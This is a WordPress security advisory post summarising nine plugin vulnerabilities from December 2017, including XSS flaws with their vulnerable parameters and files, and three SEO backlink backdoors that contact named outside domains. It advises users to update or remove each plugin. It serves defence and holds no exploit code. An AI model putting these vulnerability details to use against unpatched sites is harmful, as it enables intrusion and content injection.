Enjoy priority support and immediate help for your WordPress sites!

WP Security: 9 plugin vulnerabilities in December

WP Security: plugin vulnerabilities December

For your WP Security, be informed about the latest vulnerabilities in WordPress plugins:

  1. WP Mailster
    • Cross-Site Scripting (XSS) reported by Dewhurst Security. The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.
      • immediately update to version 1.5.5 to fix vulnerability
  2. Smart Marketing SMS and Newsletters Forms
    • Cross-Site Scripting (XSS) reported by Dewhurst Security. WordPress Smart Marketing SMS and Newsletters Forms plugin version 1.1.1 suffers from a persistent cross-site scripting vulnerability.
      • NO updates provided from developer to fix vulnerability. Remove plugin immediately.
  3. AccessPress Anonymous Post Pro
    • SQL Injection reported by Dewhurst Security. Improper sanitization allows the attacker to override the settings for allowed file extensions and upload file size. This allows the attacker to upload anything they want, bypassing the filters.
      • immediately update to version 3.2.0, to fix vulnerability.
  4. Content Cards
    • Cross-Site Scripting (XSS) reported by Dewhurst Security. Cross-site scripting (XSS) vulnerability in the Content Cards plugin before 0.9.7 for WordPress allows remote attackers to inject arbitrary JavaScript via crafted OpenGraph data.
      • immediately update to version 0.9.7 to fix vulnerability
  5. Custom Map
    • Cross-Site Scripting (XSS) reported by Dewhurst Security. A cross-site scripting (XSS) vulnerability in the custom-map plugin through 1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the map_id parameter to view/advancedsettings.php.
      • This plugin was closed on December 21, 2017 and is no longer available for download.
  6. WordPress Concours
    • Cross-Site Scripting (XSS) reported by Dewhurst Security. A cross-site scripting (XSS) vulnerability in the wp-concours plugin through 1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the result_message parameter to includes/concours_page.php.
      • This plugin was closed on December 21, 2017 and is no longer available for download..
  7. Duplicate Page and Post
    • Backdoor reported by erwanlr (twitter.com/erwan_lr). The backdoor makes a request to cloud-wp.org and will return content based on the URL and user agent passed in the query string. This code runs on every request to the site, so it can be used to inject content to normal site visitors, web crawlers, or the site administrators.
      • This plugin was closed on December 14, 2017 and is no longer available for download..
  8. No Follow All External Links
    • Backdoor reported by erwanlr (twitter.com/erwan_lr). The backdoor makes a request to cloud.wpserve.org and returns content based on the URL and user agent passed in the query string. Content injection looks to be bound to a setting in the plugin called “Improvement scheme” which is enabled by default. Disabling the setting doesn’t actually turn off the injection since the code in the if statement is setting the value instead of comparing it to 1. The code verifies that the user agent matches a web crawler (like Googlebot), so it looks like this backdoor is used for SEO by injecting backlinks onto the page.
      • This plugin was closed on December 19, 2017 and is no longer available for download..
  9. WP No External Links
    • Backdoor reported by erwanlr (twitter.com/erwan_lr). In the same manner as the previous two backdoors, this one makes a request to wpconnect.org and returns content based on the URL and user agent passed in the query string. The code verifies that the user agent matches a web crawler, so, again, it looks like this backdoor is used for SEO by injecting backlinks onto the page. Wpconnect.org resolves to the same IP as cloud-wp.org, 52.14.28.183, the API endpoint used in the Duplicate Page and Post backdoor.
      • This plugin has been closed for new installs..

Protect your WordPress: BEFORE IT'S TOO LATE! You will also protect your customers, your reputation and your online business!

Related Posts

Leave a comment